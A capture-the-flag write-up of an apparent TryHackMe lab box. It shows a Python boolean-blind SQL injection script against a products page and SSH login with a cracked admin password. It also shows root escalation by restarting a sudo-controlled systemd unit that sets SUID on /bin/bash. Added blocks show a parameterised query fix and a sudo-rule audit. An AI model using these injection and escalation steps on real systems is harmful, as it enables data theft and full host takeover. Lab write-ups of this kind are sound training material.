On this target machine, let's try not to use sqlmap, so that we practice under conditions closer to the OSCP exam.

0x00 Recon

Use rustscan for scanning.

rustscan -a 10.10.93.26

.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.93.26:22
Open 10.10.93.26:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-17 04:23 EDT
Initiating Ping Scan at 04:23
Scanning 10.10.93.26 [2 ports]
Completed Ping Scan at 04:23, 0.29s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:23
Completed Parallel DNS resolution of 1 host. at 04:23, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 5, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 04:23
Scanning 10.10.93.26 [2 ports]
Discovered open port 22/tcp on 10.10.93.26
Discovered open port 80/tcp on 10.10.93.26
Completed Connect Scan at 04:23, 0.30s elapsed (2 total ports)
Nmap scan report for 10.10.93.26
Host is up, received conn-refused (0.30s latency).
Scanned at 2023-06-17 04:23:48 EDT for 1s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack


It appears that this server has SSH and HTTP open.
Let's visit the website first and take a look.

After looking around the website, we notice that the products page appears to have an SQL injection vulnerability.

When we input "1 and 1 = 1" the page displays correctly, but when we input "1 and 1 = 0 --" it returns an error. That difference is enough for a boolean-based blind injection.

0x01 SQLI

Here we can use SQLME0w, developed by Steven Meow, with slight modifications to extract data from the database.

SQLME0w: https://github.com/stevenyu113228/SQLME0w

import requests

def boolean_based_blind(condition):
    url = 'http://10.10.93.26/products/'  # change me
    query = condition  # change me
    response = requests.get(url + query + "--")  # maybe change me

    # a TRUE condition renders the product page (200); anything else counts as FALSE
    if int(response.status_code) == 200:  # change me to other keyword or length
        return True
    else:
        return False

def test():
    meow = boolean_based_blind("1 and 1 = 1 ")
    print("Intend True: ", meow)
    meowmeow = boolean_based_blind("1 and 1 = 0")
    print("Intend False: ", meowmeow)
    if meow and not meowmeow:
        print("✅ Test success 🐱🐱🐱🐱🐱🐱🐱🐱🐱")
    else:
        print("❌ Test fail 😿😿😿😿😿😿😿😿😿😿")
    # print(boolean_based_blind("1=1")) # Return True
    # print(boolean_based_blind("1=0")) # Return False

Let's run the program to verify that the oracle works.


└─$ python3 SQLME0w_MySQL.py

▒█▀▀▀█ ▒█▀▀█ ▒█░░░ ▒█▀▄▀█ ▒█▀▀▀ █▀▀█ █░░░█
░▀▀▀▄▄ ▒█░▒█ ▒█░░░ ▒█▒█▒█ ▒█▀▀▀ █▄▀█ █▄█▄█
▒█▄▄▄█ ░▀▀█▄ ▒█▄▄█ ▒█░░▒█ ▒█▄▄▄ █▄▄█ ░▀░▀░ for MySQL


🐱 (0) System Test
🐱 (1) Get Current DB
🐱 (2) Get All DBS
🐱 (3) Get Tables
🐱 (4) Get Columns
🐱 (5) Get Data
Your Option : 0
Threads (Suggest 10): 4
Intend True: True
Intend False: False
✅ Test success 🐱🐱🐱🐱🐱🐱🐱🐱🐱
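To see why this oracle exists on the server side, and what closes it, here is an added example that is not part of the write-up or of SQLME0w. It uses a constructed in-memory SQLite products table (hypothetical schema) and contrasts a handler that splices the URL segment into SQL with one that validates and binds it.

```python
import re
import sqlite3

def make_db():
    """Constructed stand-in for the table behind /products/<id> (schema is assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)",
                     [(1, "rubber duck"), (2, "duck tape")])
    return conn

def lookup_vulnerable(conn, raw_id):
    """Builds the query by string concatenation, so the URL segment is parsed as SQL.
    Returns the product name or None. This is exactly the boolean oracle the
    write-up relies on: a true condition yields a row (page renders, HTTP 200),
    a false or broken one yields nothing (error page)."""
    sql = "SELECT name FROM products WHERE id = " + raw_id
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return None  # malformed SQL also ends up as "not found"
    return row[0] if row else None

def lookup_safe(conn, raw_id):
    """Hardened form: accept only an ASCII decimal id, then bind it as a parameter.
    The input never becomes SQL text, so 'and 1=1' / 'and 1=0' are rejected
    identically and the true/false distinction disappears."""
    if not re.fullmatch(r"[0-9]+", raw_id):
        return None
    row = conn.execute("SELECT name FROM products WHERE id = ?",
                       (int(raw_id),)).fetchone()
    return row[0] if row else None
```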

Afterward, we can retrieve the first flag from the “user” table.

Simultaneously, we can also obtain the username and hashed password of an account named “server-admin” from the “system_user” table. However, since the password appears to be hashed, we can attempt to crack it using John the Ripper (John)

Great! We have the server-admin password.
Let's try to log in.

└─$ ssh server-admin@10.10.93.26                   
server-admin@10.10.93.26's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-112-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information disabled due to load higher than 1.0


8 packages can be updated.
0 updates are security updates.


################################################################################
# Ducky Inc. Web Server 00080012 #
# This server is for authorized Ducky Inc. employees only #
# All actiions are being monitored and recorded #
# IP and MAC addresses have been logged #
################################################################################
Last login: Wed Aug 12 20:09:36 2020 from 192.168.86.65
server-admin@duckyinc:~$ ls
flag2.txt
server-admin@duckyinc:~$ cat flag2.txt
thm{4xxxxxxxxxxe}

0x02 Privilege Escalation

The first thing we should do is to examine our own permissions to determine what actions we are allowed to perform.

server-admin@duckyinc:~$ sudo -l
Matching Defaults entries for server-admin on duckyinc:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User server-admin may run the following commands on duckyinc:
(root) /bin/systemctl start duckyinc.service, /bin/systemctl enable duckyinc.service, /bin/systemctl restart duckyinc.service, /bin/systemctl daemon-reload, sudoedit
/etc/systemd/system/duckyinc.service

Hmm... it appears that we can run certain systemctl operations as root, and also sudoedit the duckyinc.service unit file itself.

server-admin@duckyinc:~$ cat /etc/systemd/system/duckyinc.service
[Service]

Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"

[Install]
WantedBy=multi-user.target

server-admin@duckyinc:~$ sudo /bin/systemctl daemon-reload
server-admin@duckyinc:~$ sudo /bin/systemctl restart duckyinc.service
server-admin@duckyinc:~$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1113504 Jun 6 2019 /bin/bash

Following the systemctl entry on https://gtfobins.github.io/gtfobins/systemctl/, we can now run anything with root privileges.

server-admin@duckyinc:~$ /bin/bash -p
bash-4.4# ls
flag2.txt
bash-4.4# whoami
root
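The sudo rule above is root-equivalent because the same user may both edit a unit file and restart it as root. As an added example (not from the write-up), here is a small audit that parses "sudo -l" output and flags that combination; the parser and its rule set are assumptions, and the sample input is the rule quoted above.

```python
import re

# Constructed sample: the "sudo -l" output from the write-up, joined onto one line.
SUDO_L_OUTPUT = """\
User server-admin may run the following commands on duckyinc:
    (root) /bin/systemctl start duckyinc.service, /bin/systemctl enable duckyinc.service, \
/bin/systemctl restart duckyinc.service, /bin/systemctl daemon-reload, \
sudoedit /etc/systemd/system/duckyinc.service
"""

UNIT_DIRS = ("/etc/systemd/system/", "/lib/systemd/system/", "/usr/lib/systemd/system/")
ACTIVATING = ("start", "restart", "enable", "reload", "reload-or-restart")

def parse_sudo_l(text):
    """Return (runas, command) tuples from the '(runas) cmd, cmd, ...' lines."""
    rules = []
    for line in text.splitlines():
        m = re.match(r"\s*\((?P<runas>[^)]+)\)\s+(?P<cmds>.+)", line)
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            rules.append((m.group("runas").strip(), cmd.strip()))
    return rules

def root_equivalent_units(rules):
    """Units the user can both edit (sudoedit) and (re)start or enable as root.
    Editing ExecStart in such a unit gives arbitrary command execution as root."""
    editable, controllable = set(), set()
    for runas, cmd in rules:
        if runas not in ("root", "ALL") and "root" not in runas.split(","):
            continue
        parts = cmd.split()
        if parts[0] == "sudoedit" and len(parts) > 1 and parts[1].startswith(UNIT_DIRS):
            editable.add(parts[1].rsplit("/", 1)[1])
        elif parts[0].endswith("systemctl") and len(parts) > 2 and parts[1] in ACTIVATING:
            controllable.add(parts[2])
    return sorted(editable & controllable)
```

The fix on the defender's side is to drop the sudoedit entry (or restrict it to a file the unit does not load), since daemon-reload plus restart is harmless on its own.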

OK, we are root. At the end of the task we also need to modify the website's homepage (/var/www/duckyinc/templates/index.html).

Finally, we can grab the last flag from /root!

bash-4.4# cd /root
bash-4.4# ls
flag3.txt
bash-4.4# cat fl*
thm{mxxxxxxxxxxxxxd}